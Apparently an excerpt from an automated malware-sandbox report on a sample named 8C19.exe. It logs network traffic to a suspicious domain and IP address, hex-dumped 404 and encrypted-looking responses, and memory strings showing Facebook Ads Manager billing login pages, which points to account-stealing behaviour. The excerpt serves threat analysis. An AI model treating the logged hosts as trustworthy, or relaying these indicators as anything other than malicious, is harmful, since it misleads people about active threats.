2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:24 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 405content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:24 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 91content-type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba f2 18 36 9d ba 91 a4 33 b2 84 c1 ee 22 8f 42 93 aa 2f 7d d3 72 49 97 04 74 b1 d6 88 1f 82 f7 47 df b5 ce e2 3a bd 07 22 c5 83 a1 a4 b4 f8 6e fc 00 8f 21 a4 c7 f0 3a 57 2a 14 4c 94 Data Ascii: %S`Nh&WQY^&63"B/}rItG:"n!:W*L
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:25 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 405content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:25 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 405content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:25 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 405content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:26 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 405content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:26 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 69content-type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ba 87 aa e3 f8 17 5a f3 c5 64 e6 bb 3c 30 c8 bf a0 fa 14 ba aa 92 89 7a a6 72 8f 96 32 31 c8 7b 5f a7 1e 36 93 97 97 2b dc fb 14 82 b6 ca c1 3e f1 Data Ascii: %S`Nh&WQY^Zd<0zr21{_6+>
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: unknownTCP traffic detected without corresponding DNS query: 185.174.137.174
                Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: </span><a href="/r.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;locale=en_US&amp;display=page" rel="nofollow" class="_97w5">Sign up for Facebook</a></div></div><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value="" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type" /><input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false" /><input type="hidden" autocomplete="off" id="had_password_prefilled" name="had_password_prefilled" value="false" /><input type="hidden" autocomplete="off" name="ab_test_data" value="" /></form><script nonce="BgTs8qFM">window.ge||(window.ge=function(a){return document.getElementById(a)});window.onload=function(a){return function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=new RegExp(a+"=(.*?)(;|$)");return a.test(document.cookie)?RegExp.$1:null}b("c_user")&&!window.__cancelCookieReload&&(window.clearInterval(window.__cookieReload),window.location=a)}function begin_polling_login_cookies(a){window.__cookieReload=window.setInterval(function(){reload_on_new_cookie(a)},5e3),window.__cancelCookieReload=!1,window.addEventListener("beforeunload",function(){window.__cancelCookieReload=!0})}</script></div></div></div></div><div class=""><div class="_95ke _8opy"><div id="pageFooter" data-referrer="page_footer" data-testid="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_US&quot;, &quot;https:\/\/de-de.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 0); return false;" title="German">Deutsch</a></li><li><a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 1);
                Source: 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: </span><a href="/r.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;locale=en_US&amp;display=page" rel="nofollow" class="_97w5">Sign up for Facebook</a></div></div><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value="" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /><input type="hidden" autocomplete="off" id="first_prefill_source" name="first_prefill_source" /><input type="hidden" autocomplete="off" id="first_prefill_type" name="first_prefill_type" /><input type="hidden" autocomplete="off" id="had_cp_prefilled" name="had_cp_prefilled" value="false" /><input type="hidden" autocomplete="off" id="had_password_prefilled" name="had_password_prefilled" value="false" /><input type="hidden" autocomplete="off" name="ab_test_data" value="" /></form><script nonce="xFgijA3d">window.ge||(window.ge=function(a){return document.getElementById(a)});window.onload=function(a){return function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=new RegExp(a+"=(.*?)(;|$)");return a.test(document.cookie)?RegExp.$1:null}b("c_user")&&!window.__cancelCookieReload&&(window.clearInterval(window.__cookieReload),window.location=a)}function begin_polling_login_cookies(a){window.__cookieReload=window.setInterval(function(){reload_on_new_cookie(a)},5e3),window.__cancelCookieReload=!1,window.addEventListener("beforeunload",function(){window.__cancelCookieReload=!0})}</script></div></div></div></div><div class=""><div class="_95ke _8opy"><div id="pageFooter" data-referrer="page_footer" data-testid="page_footer"><ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;de_DE&quot;, &quot;en_US&quot;, &quot;https:\/\/de-de.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 0); return false;" title="German">Deutsch</a></li><li><a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 1);
                Source: 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ",fds:60,fda:60,i:60,sbs:1,dbs:100,bbs:100,hbi:60,rt:262144,hbcbc:2,hbvbc:0,hbbi:30,sid:-1,hbv:"6053591329617399234"}]],["NavigationMetrics","setPage",[],[{page:"XWebLoginController",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7155575378678572287"}]],["FalcoLoggerTransports","attach",[],[]],["Chromedome","start",[],[{}]],["NavigationClickPointHandler"],["ServiceWorkerURLCleaner","removeRedirectID",[],[]],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","5bVNY4FmIh2T_pp8TKyvzxjP",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","5bVNY_SvyCxTGzDctobklTe8",63072000000,"/",false,false,true]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]]]},hsrp:{hsdp:{clpData:{"1743095":{r:1,s:1},"1871697":{r:1,s:1},"1829319":{r:1},"1829320":{r:1},"1843988":{r:1}},gkxData:{"1652843":{result:false,hash:"AT6uh9NWRY4QEQoY5aY"}}},hblp:{consistency:{rev:1006402711},rsrcMap:{zPYlTyl:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/pslzeMSEB_a.js?_nc_x=Ij3Wp8lg5Kz"},wL2J9cL:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/xXDOO3oMCfl.js?_nc_x=Ij3Wp8lg5Kz"}},compMap:{TransportSelectingClientSingleton:{r:["z9xmXAe","owesA3P"]$4{+ equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.535730121.000000000238E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.535094361.00000000023BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comf; equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.535730121.000000000238E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.comwP equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_DCIoZ9fhhuS sx_1132bf"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT3HdDjBfS7-3o9IYFj_aingMK21knT70XfMS-Qns1SqBdBCTMbSUAQ9KJproUzBZjUfoboZ5pSE7BHD8TXKrOzC3c6CsCVCPjDn_R3w2ael58Y0Cwyi4ENPKG1IdxUvLuLSDElTK9u4CQTUkgycjA" title="Check out Instagram" target="_blank" rel="noopener nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bulletin</a></li><li><a href="/local/lists/245019872666104/" title="Browse our Local Lists directory.">Local</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/groups/explore/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.facebook.com/" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></li><li><a href="/pages/create/?ref_type=site_footer" title="Create a page">Create Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="
